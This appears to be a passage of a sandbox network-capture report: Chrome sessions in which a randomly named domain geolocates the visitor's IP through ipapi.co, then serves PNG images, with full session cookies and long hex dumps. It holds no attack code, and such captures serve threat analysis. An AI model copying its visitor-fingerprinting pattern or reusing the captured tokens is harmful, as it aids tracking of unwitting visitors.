                                                              Data Ascii: { "origin": "8.46.123.33"}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              81192.168.2.662963104.26.9.444434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:10 UTC557OUTGET /8.46.123.33/json/ HTTP/1.1
                                                              Host: ipapi.co
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:10 UTC715INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:10 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 763
                                                              Connection: close
                                                              Allow: POST, OPTIONS, HEAD, OPTIONS, GET
                                                              X-Frame-Options: DENY
                                                              Vary: Host, origin
                                                              access-control-allow-origin: https://vkwek.ckyucle.com
                                                              X-Content-Type-Options: nosniff
                                                              Referrer-Policy: same-origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRZ5Us98XnWtDHLEE0u%2BZG25XD5Op29qy5I6gjeiPV94MeaMjKMKQaOOH58toooDkViwY4htbOcduwMInvMWpIef2i6S1CQW3mtpatnXoys1HRV3AOfOlyjg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b4a3e868c09-EWR
                                                              2024-07-03 07:41:10 UTC654INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e
                                                              Data Ascii: { "ip": "8.46.123.33", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "coun
                                                              2024-07-03 07:41:10 UTC109INData Raw: 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 4c 45 56 45 4c 33 22 0a 7d
                                                              Data Ascii: "country_area": 9629091.0, "country_population": 327167434, "asn": "AS3356", "org": "LEVEL3"}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              82192.168.2.662966188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:10 UTC1127OUTGET /ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:11 UTC655INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:11 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 49602
                                                              Connection: close
                                                              Content-Disposition: inline; filename="ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZzncChFRGZS8LymP5rzBUj79JBTg%2BGV1J0rBnxOYugaHnQoqMC0WFAkFTgjVHOr1SxMevEPzf9YNGf1VMzNzrLQp3IOyNdCaFj7k%2B3YarPrfvEhzhmJDvbSKthpvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b4d9df443dd-EWR
                                                              2024-07-03 07:41:11 UTC714INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                              Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3 24 e2 27 53 ad
                                                              Data Ascii: $I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$$'S
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de c0 b1 23 70 13 30 34 3a 48 cd 4d 07 fe 45 7a
                                                              Data Ascii: PD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$#p04:HMEz
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92 24 65 b1 22 30 81 f8 c9 b4 a2 eb bb c0 e0 4c
                                                              Data Ascii: zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I$e"0L
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26 fe 9c eb 74 bd 42 6a 5c 91 ba cd 59 c4 5f 7f
                                                              Data Ascii: Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&tBj\Y_
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43 f1 06 00 37 11 7f 7e 75 a2 26 e3 e4 ad 94 c3
                                                              Data Ascii: 3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC7~u&
                                                              2024-07-03 07:41:11 UTC1369INData Raw: d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70 b8 fa 46 b5 bd 9d fa 3e ed 3b 07 f8 4f e0 96
                                                              Data Ascii: _OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+pF>;O
                                                              2024-07-03 07:41:11 UTC1369INData Raw: ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c d7 c0 d1 ee 72 21 9d f6 3c 30 31
                                                              Data Ascii: R?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8r!<01
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c 9b b4 ad dc ba a4 e6 82 0f 00 97
                                                              Data Ascii: &w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1 56 79 65 72 1b f0 66 e0 5f d1 41
                                                              Data Ascii: -%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SGVyerf_A


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              83192.168.2.662967188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:10 UTC1134OUTGET /uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:11 UTC668INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:11 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 70712
                                                              Connection: close
                                                              Content-Disposition: inline; filename="uvjwVVwGEKsrxbM6oO2WNguxpWDZE767qA3s6RHiwTp8DGWBbz5E0shyuHrSHEhUngh253"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skfQt%2B5U4fl3XEyY7PPuw78Vq9wV6KH4PLaKa%2FK%2BvLXrmjVOrTbdgpN9SwdxGQDNZ6T2s%2FAUk6WV72vOY9OSuQqC0wADz24ovDUEy1zrX51J5eZzUWgB4ebU%2B7c1lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b4e2d47424c-EWR
                                                              2024-07-03 07:41:11 UTC701INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                              Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                              2024-07-03 07:41:11 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                              Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
